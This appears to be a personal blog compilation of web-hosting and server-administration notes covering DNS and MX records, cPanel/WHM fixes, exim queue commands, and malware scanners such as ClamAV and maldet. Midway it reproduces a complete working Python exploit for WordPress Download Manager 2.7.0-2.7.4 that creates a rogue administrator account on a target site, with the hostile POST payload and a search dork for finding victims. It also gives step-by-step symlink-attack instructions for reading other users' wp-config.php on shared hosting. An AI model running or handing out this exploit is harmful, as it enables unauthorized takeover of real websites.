How can I put my email with one host and website with another

Nowadays there are a ton of options when researching what an “ideal” web hosting solution should be. You might find that you’ve outgrown your current platform, or perhaps you want to go with something a bit more simplistic like dragging and dropping rather than teaching yourself HTML or CSS.
After you decided to take the plunge of switching hosting providers, you find yourself researching how to make transition as smooth as possible. You’ve accomplished updating the “A records” to the servers’ new home and breathe a sigh of relief only to realize that you’re inbox has become silent and refuses to cooperate.
Doh! “What about the email servers? Do I have to switch email over to the new hosting provider?” you ask yourself. The answer is “no.” You can manage your email the way you always have, but your new hosting provider’s DNS needs to know where to find it.
Assuming you chose to keep your email provider (server) just the way it was and not migrate your email over to your new hosting provider, then there are key steps you must take to ensure your email stays intact while the website’s domain thrives in its new habitat.
What often happens is that the Mail Exchanger (MX) record is pointing to yourdomain.com – but because you just changed yourdomain.com to point somewhere else (remember when you updated the A record so the web domain will have a new home?) @yourdomain.com is no longer working for email.
No need to panic. You don’t have to be a DNS guru to split your email from your website hosting. It’s actually quite painless, read on…
So How Can I Keep My Email Provider Separate From Web Hosting Provider?
For those of us who don’t go underneath the DNS hood every day, there are two key pieces you need to know if you want your email provider to reside separately from your website hosing provider.

1. The mail server must know about the new name server (the DNS server keeping track of the domain names and IP addresses). So we must define your “A (host) record” for mail, which we’ll explain in detail in a moment.
2. The Internet must know where the email is being  processed (this is the job of the MX record)

Let’s walk through a real world scenario:
Say you were using a hosting provider which also included email) but decided to switch to a different hosting company (e.g. Weebly*) and wanted to leave email with the current hosting company.
To accomplish this, you would just change your A records for www.yourdomain.com (and the non-www version, yourdomain.com) to the IP address of your new hosting provider (which they provide) but don’t stop there. To ensure email works the way it always has, you must ensure mail.yourdomain.com is pointing to its existing IP address AND then change the MX record to now point to mail.yourdomain.com.
In your DNS Zone Editor Section, you can make updates to your DNS records.
Screenshot shows example IP addresses (be sure to use your own IP addresses accordingly):

Will this work on Email Hosted By Godaddy, InMotion, JustHost, or HostGator?
Yes – regardless of the email provider or web hosting provider, the rules described above are the same. DNS settings containing your A records and MX records are universal (if they weren’t, then the Internet would not have grown beyond a laboratory of a few computers).
How Long Does It Take Before I Start Seeing My Email Again?
After updating the MX record and A record, propagation (the fancy word which simply means “for the rest of the Internet to catch up”) can take as little as 3 hours but as many as 48 hours. It varies, so you’re not seeing the results you expected, be sure to give it the full 48 hours.
Tip: You can check how other servers around the world are acknowledging your changes (DNS propagation) by using a free DNS checker found at http://www.whatsmydns.net/.


*If really using Weebly, keep in mind they don’t host email, and I advise against using their recommendation of the costly Google Apps that run $60/year per mailbox!

Owner root gets "Operation not permitted" on chmod, rm -rf

Bug : rm -rf, chmod as root: permission denied?

Solution :

$ chattr -i dir
$ rm -rf dir

500 error with suphp configuration

Solution :

Use it in your .htacess

#Use PHP 5.4
# Use PHP54 as default
#AddHandler application/x-httpd-php54 .php
<IfModule mod_suphp.c>
    suPHP_ConfigPath /opt/php54/lib
</IfModule>

Reset or Set Default Permissions to Domain for Files and Directories in cPanel

If your permissions are incorrect for files and folders in a webroot domain more than likely you’ll get a server 500 error. Here is how to fix them by resetting, especially using the correct defaults for a cPanel domain or other web server for files and directories.


You can bulk fix these permissions on the command line, with these commands:

cd /home/yourdomain/public_html/

Go to your webroot directory

find . -type d -exec chmod 755 {} \;

Fix the permissions on directories

find . -type f -exec chmod 644 {} \;

Fix the permissions on files

Symlink find

find /home*/*/public_html -type l >> /root/symlinks.txt

Cryptolocker Virus Removal

Restart your computer. Before the Windows Interface loads, enter F8 key continuously. Select ‘Safe Mode with Networking’ and hit Enter. Or you can follow the steps below to get rid of the virus manually.

• Open Windows Task Manager by clicking CTRL+ALT+DELETE or CTRL+SHIFT+ESC. Look for the Cryptolocker processes. Right click to finish them.
• Go to Start menu and click Control Panel and look for the Folder option. Now click on the View tab and tick Show Hidden Files and Folders and untick Hide Protected Operating System Files. Click OK.
• Go to Start menu and click Search Programs and Files. Look for the files created by Cryptolocker and delete them.
• By pressing Windows+R open Registry Editor. In the Run box, type in regedit and hit OK.
• Reboot your computer and you should find that the Cryptolocker Virus has been removed. 

Source : avstrike.com

Note: More help need, buy my gigs from here

Find all SSH users besides you

 To find all users beside you , use this command :

grep ssh /var/log/secure|grep Accepted

apache problem

If you have any apache problem with lynx , just run this script and it will fix all.

/scripts/upcp --force

Emil Commands

Check any email :

 exim -Mvh 1YaOs6-0007Ol-ME

Cpanel shows 500 error with php fatal

Updating your suPHP_ConfigPath value in your .htaccess file

Making your php.ini file affect all child folders as well is referred to as making the file "recursive". To make your public_html/php.ini file recursive, edit (or create the file if it doesn't exist) your public_html/.htaccess file and add the following code:

suPHP_ConfigPath /home/username/public_html

Enable SSH and WHM login Alert emails

Enable WHM login Alerts

You can enable this option in CSF firewall configuration.
/etc/csf/csf.conf
WHM >> Plugins >> ConfigServer Security&Firewall > csf – ConfigServer Firewall”.
Just click the “Firewall Configuration”
# Send an email alert if anyone accesses WHM via root. An IP address will be
# reported again 1 hour after the last tracked access (or if lfd is restarted)
LF_CPANEL_ALERT = “1”

Enable SSH login Alerts

Login to your server as root user
cd /root
vi .bashrc
Scroll to the end of the file then add the following:
echo ‘ALERT – Root Shell Access (ServerName) on:’ `date` `who` | mail -s “Alert: Root Access from `who | cut -d'(‘ -f2 | cut -d’)’ -f1`” your@yourdomain.com
Replace YourServerName with the handle for your actual server
Replace you@yourdomain.com with your actual email address

Exim Remove All messages From the Mail Queue

To print a list of the messages in the queue, enter:

# exim -bp

To remove a message from the queue, enter:

# exim -Mrm {message-id}

To remove all messages from the queue, enter:

# exim -bp | awk '/^ *[0-9]+[mhd]/{print "exim -Mrm " $3}' | bash


or
 
 # exim -bp | exiqgrep -i | xargs exim -Mrm

Essential Linux Commands

How to see all folder permissios in linux 

ls -l /home [home is directory name]

tail -f /usr/local/apache/logs/error_log | grep gemsandj
                

Find Apache logs

tail -f /usr/local/apache/logs/error_log 

http://thecpaneladmin.com/fix-account-permissions/  

Apache start 

/etc/init.d/httpd start 

Move your forum to a new domain ;)

Hey there, do you need to move your current forum to a new domain or you want to copy existing forum to a new domain .

If your answer is yes, they surely you can rely on me ;)

Because I am the right guy for it. Because I know how to do that without any data loss :)

Find me on fiverr and hire me for your task :)

Good luck buddy :)

WP HTTP Error: Problem with the SSL CA cert

To resolve the issue, you’ll need to restart Apache (or nginx). If that doesn’t fix the problem, you’ll need to restart your entire server.

How to setup Zoho Mail to Bluehost

Yahoo, you will see many many options . But actually it is very easy. Just look at screenshot and do that for your expected domains. ..

How to change a domain nameserver from squarespace to bluehost.

Yesterday, I have to change a domain nameserver from squarespace to bluehost. It takes at least 4 hours to find out the way ...

Why ?

Point 1: When I point nameserver to bluehost and trying to attach my domain it shows verified but verification required.

Point 2: Squarespace is a prebuilt site like wix.com . So it has no upload option by which I can verify it.

Point 3: The otherman who own this domain before not wish to give his password of old hosting..

Point 4: But he wants to help me anyway ...

So what I have to do ....
 
Just a trick ;) and it works perfectly ...

Increase Bandwidth for a domain

To increase the bandwidth you need to use WHM, not cPanel.

To do so go to your WHM Panel (http://serverhostname.com:2086) --> Limit Bandwidth Usage (under the 'Account Functions' section) --> Select the domain and press 'Limit' --> Increase the number and hit 'Change'

To make the domain have unlimited bandwidth, you can input 'unlimited' into the box and this will do this.

Hopefully that answers your question!

How To Enable BoxTrapper In cPanel/WHM Server?

1) Login into WHM.
2) Click on Tweak Settings [see image below]


3) check/uncheck on BoxTrapper Spam Trap under email settings to enable/disable it. [see this image]

4) Save the settings.

That’s it!

How to enable SpamAssassin in cPanel/WHM

Spam filters are a very important part of any mail server. ServInt VPS accounts using the cPanel/WHM control panel come with SpamAssassin as part of the standard installation. The default configuration has SpamAssassin enabled.

If you need to reenable SpamAssassin:

• In WHM, under Server Configuration on the top of the left-hand navigation bar, click on Tweak Settings.
• Click the Mail tab. 
• Select On for "Enable SpamAssassin spam filter."

Note: ServInt recommends leaving "Enable BoxTrapper spam trap" set to Off.

To force all the users on your VPS to use SpamAssassin:

• Scroll down the left left hand navigation bar in WHM to Service Configuration and click on Exim Configuration Manager.
• Select the SpamAssassin tab.
• Set "Spam Assassin: Forced Global ON" to On. 

This will filter all of your email for spam.  It will not, however, force your users to do anything with it after it's filtered. It will simply mark spam as spam, nothing more.

cPanel temporary URL not working

When accessing cPanel temporary URL, at times you get a 404 error. This is even if the cPanel account is created & website content uploaded on the server. Monitoring apache error log file, it shows error as below.

File does not exist: /usr/local/apache/htdocs/~user

This happens when mod_userdir is enabled on the server. Apache’s mod_userdir allows users to view their sites by entering a tilde(~) and their username as the URL on a specific host. For example http://server-ip/~user/ will bring up the user user’s domain. The disadvantage of this feature is that any bandwidth usage used by this site will be put on the domain it is accessed under (in this case test.domain.com). mod_userdir protection prevents this from happening. You may however want to disable it on specific virtual hosts (generally shared ssl hosts.) When accessing with the temp URL nobody user has to be excluded from the mod_userdir restriction.
Login to your WHM as root & access option Security Center >> Apache mod_userdir Tweak. Uncheck for DefaultHost (nobody) & click on save. Try accessing the temporary URL now.

Note: Just write user in left hand search field and you get Apache mod_userdir ...

How to turn off php safe_mode off for a particular directory in a shared hosting environment?

Your service provider might have forgot to tell you that you need to enable your user defined php.ini configuration by adding this line in the .htaccess file that you find in your public_html folder:

#Activates php.ini config located in main folder to work also recursively for all subfolders
suPHP_ConfigPath /home/YOUR_CPANEL_USER_NAME/public_html

Obviously replace YOUR_CPANEL_USER_NAME with your cPanel user name.
I'm supposing your server has got suPHP module(which is quite common in nowdays).
BTW: the php.ini file need to be in /home/YOUR_CPANEL_USER_NAME/public_html too and inside you should write this:
safe_mode = Off And remember that Safe Mode is deprecated in PHP 5.3.0 and is removed in PHP 6.0.0.

Solutions for handling symlink attacks

1) He login to cPanel as a normal user http://ip-address/cpanel then type login and password to Login
2) Then he open File manager (show hidden files "dotfiles") and then creates new .htaccess file with following source:
#.htaccess file source
Options Indexes FollowSymLinks
DirectoryIndex doesnt-metter.htm
AddType txt .php
AddHandler txt .php
#End of .htaccess file
3) Then he creates symbalic link (soft link) with perl scripts or just uses CRON job to create symbalic link of top level directory "/" typing: "ln -s / topdir"
4) After that, he open browser and typing http://server-ip/~his-home-dir/topdi.../wp-config.php and then just looking source of the page, all data present as a TXT(text) data. That's all. User has been hacked.
-------------------------------------------------------------------------------------------------------
Solution:
1) Open you'r php.conf with you'r favorite editor: nano /usr/local/apache/conf/php.conf
2) Commit: #AddType application/x-httpd-php5 .php5 .php4 .php .php3 .php2 .phtml
3) Add these lines:
<FilesMatch "\.ph(p[2-6]?|tml)$"> # this equal to: .php, .php2, .php3, .php4, .php5, .php6 .phtml
SetHandler application/x-httpd-php5
</FilesMatch>
4) Save you'r changes and close php.conf
5) Restart httpd server typing: /etc/init.d/httpd restart
6) Done

How do I fix the error “Mysql Server has gone away”?

The MySQL server has gone away (error 2006) has two main causes and solutions:

• Server timed out and closed the connection. To fix, check that “wait_timeout” mysql variable in your my.cnf configuration file is large enough.
• Server dropped an incorrect or too large packet. If mysqld gets a packet that is too large or incorrect, it assumes that something has gone wrong with the client and closes the connection. To fix, you can increase the maximal packet size limit “max_allowed_packet” in my.cnf file, eg. set max_allowed_packet = 128M, then sudo /etc/init.d/mysql restart.

For wamp, you have to check in my.ini  in wamp in bin > mysql

Check for old plugins with exploit database...

Exploit Database :

http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=wordpress&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_exploit_text=&filter_port=0&filter_osvdb=&filter_cve=


CVE :

http://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/Wordpress-Wordpress.html


WP SCAN

https://wpvulndb.com/ 

http://www.wordpressexploit.com/

http://wpsecure.net/

Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability

#!/usr/bin/python

#

# Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution

#

# Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html)

#

# Exploit written by Claudio Viviani

#

#

# 2014-12-03:  Discovered vulnerability

# 2014-12-04:  Patch released (2.7.5)

#

# Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk

#

# --------------------------------------------------------------------

#

# The vulnerable function is located on "/download-manager/wpdm-core.php" file:

#

# function wpdm_ajax_call_exec()

# {

#    if (isset($_POST['action']) && $_POST['action'] == 'wpdm_ajax_call') {

#         if (function_exists($_POST['execute']))

#             call_user_func($_POST['execute'], $_POST);

#         else

#             echo "function not defined!";

#         die();

#     }

# }

#

# Any user from any post/page can call wpdm_ajax_call_exec() function (wp hook).

# wpdm_ajax_call_exec() call functions by call_user_func() through POST data:

#

#         if (function_exists($_POST['execute']))

#             call_user_func($_POST['execute'], $_POST);

#         else

#         ...

#         ...

#         ...

#

# $_POST data needs to be an array

#

#

# The wordpress function wp_insert_user is perfect:

#

# http://codex.wordpress.org/Function_Reference/wp_insert_user

#

# Description

#

# Insert a user into the database.

#

# Usage

#

# <?php wp_insert_user( $userdata ); ?>

#

# Parameters

#

# $userdata

#     (mixed) (required) An array of user data, stdClass or WP_User object.

#        Default: None

#

#

#

# Evil POST Data (Add new Wordpress Administrator):

#

# action=wpdm_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator

#

# ---------------------------------------------------------------------

#

# Dork google:  index of "wordpress-download"

#

# Tested on Wordpress Download Manager from 2.7.0 to 2.7.4 version with BackBox 3.x and python 2.6

#

# Http connection

import urllib, urllib2, socket

#

import sys

# String manipulator

import string, random

# Args management

import optparse

 

# Check url

def checkurl(url):

    if url[:8] != "https://" and url[:7] != "http://":

        print('[X] You must insert http:// or https:// procotol')

        sys.exit(1)

    else:

        return url

 

# Check if file exists and has readable

def checkfile(file):

    if not os.path.isfile(file) and not os.access(file, os.R_OK):

        print '[X] '+file+' file is missing or not readable'

        sys.exit(1)

    else:

        return file

 

def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):

    return ''.join(random.choice(chars) for _ in range(size))

 

banner = """

    ___ ___               __

   |   Y   .-----.----.--|  .-----.----.-----.-----.-----.

   |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|

   |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|

   |:      |    ______      |__|              __                __

   |::.|:. |   |   _  \ .-----.--.--.--.-----|  .-----.---.-.--|  |

   `--- ---'   |.  |   \|  _  |  |  |  |     |  |  _  |  _  |  _  |

               |.  |    |_____|________|__|__|__|_____|___._|_____|

               |:  1    /   ___ ___

               |::.. . /   |   Y   .---.-.-----.---.-.-----.-----.----.

               `------'    |.      |  _  |     |  _  |  _  |  -__|   _|

                           |. \_/  |___._|__|__|___._|___  |_____|__|

                           |:  |   |                 |_____|

                           |::.|:. |

                           `--- ---'

                                                   Wordpress Download Manager

                                                      R3m0t3 C0d3 Ex3cut10n

                                                         (Add WP Admin)

                                                          v2.7.0-2.7.4

 

                               Written by:

 

                             Claudio Viviani

 

                          http://www.homelab.it

 

                             info@homelab.it

                         homelabit@protonmail.ch

 

                   https://www.facebook.com/homelabit

                      https://twitter.com/homelabit

                    https://plus.google.com/+HomelabIt1/

           https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

"""

 

commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')

commandList.add_option('-t', '--target', action="store",

                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",

                  )

commandList.add_option('--timeout', action="store", default=10, type="int",

                  help="[Timeout Value] - Default 10",

                  )

 

options, remainder = commandList.parse_args()

 

# Check args

if not options.target:

    print(banner)

    commandList.print_help()

    sys.exit(1)

 

host = checkurl(options.target)

timeout = options.timeout

 

print(banner)

 

socket.setdefaulttimeout(timeout)

 

username = id_generator()

pwd = id_generator()

 

body = urllib.urlencode({'action' : 'wpdm_ajax_call',

                         'execute' : 'wp_insert_user',

                         'user_login' : username,

                         'user_pass' : pwd,

                         'role' : 'administrator'})

 

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}

 

print "[+] Tryng to connect to: "+host

try:

    req = urllib2.Request(host+"/", body, headers)

    response = urllib2.urlopen(req)

    html = response.read()

 

    if html == "":

       print("[!] Account Added")

       print("[!] Location: "+host+"/wp-login.php")

       print("[!] Username: "+username)

       print("[!] Password: "+pwd)

    else:

       print("[X] Exploitation Failed :(")

 

except urllib2.HTTPError as e:

    print("[X] "+str(e))

except urllib2.URLError as e:

    print("[X] Connection Error: "+str(e))

Find Vulnerable timthumb script all over the server

find . -name "*thumb.php" -exec grep -H -n 'WEBSHOT_ENABLED' {} \;

or

find / -name '*.php' -exec grep WEBSHOT_ENABLED {} \;


To secure it use :

define (‘WEBSHOT_ENABLED’, false); 

Clamav Commands 4.1.2015

Terminal

At first you have to update the virus definitions with:

sudo freshclam

Then you can scan for viruses.

 clamscan OPTIONS File/Folder 

If necessary start with root permissions: sudo clamscan.
Examples:

• To check all files on the computer, displaying the name of each file:
  

  clamscan -r /
  

• To check all files on the computer, but only display infected files and ring a bell when found:
  

  clamscan -r --bell -i /
  

• To check files in the all users home directories:
  

  clamscan -r /home
  

• To check files in the USER home directory and move infected files to another folder:
  

  clamscan -r --move=/home/USER/VIRUS /home/USER
  

• To check files in the USER home directory and remove infected files (WARNING: Files are gone.):
  

  clamscan -r --remove /home/USER
  

• To see more options:
  

  clamscan --help 

  Source: http://askubuntu.com/questions/250290/how-do-i-scan-for-viruses-with-clamav 

Maldet Installation

Malware Detect is very easy to install on CentOS, regardless of the control panel you utilize (cPanel/WHM, Directadmin, etc). Maldet also known as Linux Malware Detect virus scanner for Linux.
There is nothing complicated in installation process, but root access to your server is required. 
Installation via SSH

cd /usr/local/src/
wget http://www.rfxn.com/downloads/maldetect-current.tar.gz
tar -xzf maldetect-current.tar.gz
cd maldetect-*
sh ./install.sh or sudo sh ./install.sh
maldet --update-ver
maldet --update[/i]

To scan a folder, for example /home you should type maldet -a /home.

That's it!

Maldet Essential Commands

Syntax:

# maldet [options] /path/to/scan

Important switches of maldet:

1, -b, –background
Execute operations in the background, ideal for large scans

Example:

[root@crybit ~]# maldet -b -r /home/crybit/
Linux Malware Detect v1.4.2
            (C) 2002-2013, R-fx Networks <proj@r-fx.org>
            (C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(9922): {scan} launching scan of /home/crybit/ changes in last 7d to background, see /usr/local/maldetect/event_log for progress

2, -u, –update
Update malware detection signatures from rfxn.com

3, -d, –update-ver
Update the installed version from rfxn.comExample:

[root@crybit ~]# maldet -d
Linux Malware Detect v1.4.2
            (C) 2002-2013, R-fx Networks <proj@r-fx.org>
            (C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(9997): {update} checking for available updates...
maldet(9997): {update} hashing install files and checking against server...
maldet(9997): {update} version check shows latest but hash check failed, forcing update...
maldet(9997): {update} completed update v1.4.2 => v1.4.2, running signature updates...
maldet(10289): {sigup} performing signature update check...
maldet(10289): {sigup} local signature set is version 201402051649
maldet(10289): {sigup} latest signature set already installed
maldet(9997): {update} update and config import completed.

4, -m, –monitor USERS|PATHS|FILE
Run maldet with inotify kernel level file create/modify monitoring
If USERS is specified, monitor user homedirs for UID’s > 500
If FILE is specified, paths will be extracted from file, line spaced
If PATHS are specified, must be comma spaced list, NO WILDCARDS!
e.g: maldet –monitor users
e.g: maldet –monitor /root/monitor_paths
e.g: maldet –monitor /home/mike,/home/ashton

Example:

[root@crybit ~]# maldet -m /home/crybit/
Linux Malware Detect v1.4.2
            (C) 2002-2013, R-fx Networks <proj@r-fx.org>
            (C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(10347): {mon} set inotify max_user_instances to 128
/usr/local/sbin/maldet: line 1162: /proc/sys/fs/inotify/max_user_instances: Permission denied
maldet(10347): {mon} set inotify max_user_watches to 0
/usr/local/sbin/maldet: line 1164: /proc/sys/fs/inotify/max_user_watches: Permission denied
maldet(10347): {mon} added /home/crybit/ to inotify monitoring array
maldet(10347): {mon} starting inotify process on 1 paths, this might take awhile...
maldet(10347): {mon} inotify startup successful (pid: 10422)
maldet(10347): {mon} inotify monitoring log: /usr/local/maldetect/inotify/inotify_log

5, -k, –kill
Terminate inotify monitoring service

Example:

[root@crybit ~]# maldet -k
Linux Malware Detect v1.4.2
            (C) 2002-2013, R-fx Networks <proj@r-fx.org>
            (C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2
maldet(10471): {mon} sent kill to monitor service

6, -r, –scan-recent PATH DAYS
Scan files created/modified in the last X days (default: 7d, wildcard: ?)

e.g: maldet -r /home/?/public_html 2

7, -a, –scan-all PATH
Scan all files in path (default: /home, wildcard: ?)

e.g: maldet -a /home/?/public_html

8, -c, –checkout FILE
Upload suspected malware to rfxn.com for review & hashing into signatures

9, -l, –log
View maldet log file events.Example:

[root@crybit ~]# maldet -l
Linux Malware Detect v1.4.2
            (C) 2002-2013, R-fx Networks <proj@r-fx.org>
            (C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

Feb 06 02:38:28 jishnu maldet(10347): {mon} set inotify max_user_watches to 0
Feb 06 02:38:28 jishnu maldet(10347): {mon} added /home/crybit/ to inotify monitoring array
Feb 06 02:38:28 jishnu maldet(10347): {mon} starting inotify process on 1 paths, this might take awhile...
Feb 06 02:38:30 jishnu maldet(10347): {mon} inotify startup successful (pid: 10422)
Feb 06 02:38:30 jishnu maldet(10347): {mon} inotify monitoring log: /usr/local/maldetect/inotify/inotify_log
Feb 06 02:39:43 jishnu maldet(10471): {mon} sent kill to monitor service
Feb 06 02:40:00 jishnu maldet(10347): {mon} monitoring terminated by user, inotify killed.
Feb 06 02:41:00 jishnu maldet(10550): {scan} signatures loaded: 11552 (9668 MD5 / 1884 HEX)
Feb 06 02:41:00 jishnu maldet(10550): {scan} building file list for /home/crybit/ of new/modified files from last 1 days, this might take awhile...
Feb 06 02:41:00 jishnu maldet(10550): {scan} scan returned zero results, please increase days range or provide a new path.
Feb 06 02:41:11 jishnu maldet(10615): {scan} signatures loaded: 11552 (9668 MD5 / 1884 HEX)
Feb 06 02:41:11 jishnu maldet(10615): {scan} building file list for /home/crybit/ of new/modified files from last 2 days, this might take awhile...
Feb 06 02:41:11 jishnu maldet(10615): {scan} scan returned zero results, please increase days range or provide a new path.

10, -e, –report SCANID email
View scan report of most recent scan or of a specific SCANID and optionally e-mail the report to a supplied e-mail address.
e.g: maldet –report
e.g: maldet –report list
e.g: maldet –report 050910-1534.21135
e.g: maldet –report SCANID user@domain.com

11, -s, –restore FILE|SCANID
Restore file from quarantine queue to orginal path or restore all items from a specific SCANID
e.g: maldet –restore /usr/local/maldetect/quarantine/config.php.23754
e.g: maldet –restore 050910-1534.21135

12, -q, –quarantine SCANID
Quarantine all malware from report SCANID
e.g: maldet –quarantine 050910-1534.21135

13, -n, –clean SCANID
Try to clean & restore malware hits from report SCANID
e.g: maldet –clean 050910-1534.21135

14, -U, –user USER
Set execution under specified user, ideal for restoring from user quarantine or to view user reports.
e.g: maldet –user nobody –report
e.g: maldet –user nobody –restore 050910-1534.21135

15, -p, –purge
Clear logs, quarantine queue, session and temporary data.

That’s it!!

Source : http://crybit.com/maldet-options/

Maldet Scan Command

Maldet Single Account Scan Command :

maldet --scan-all /home/domainname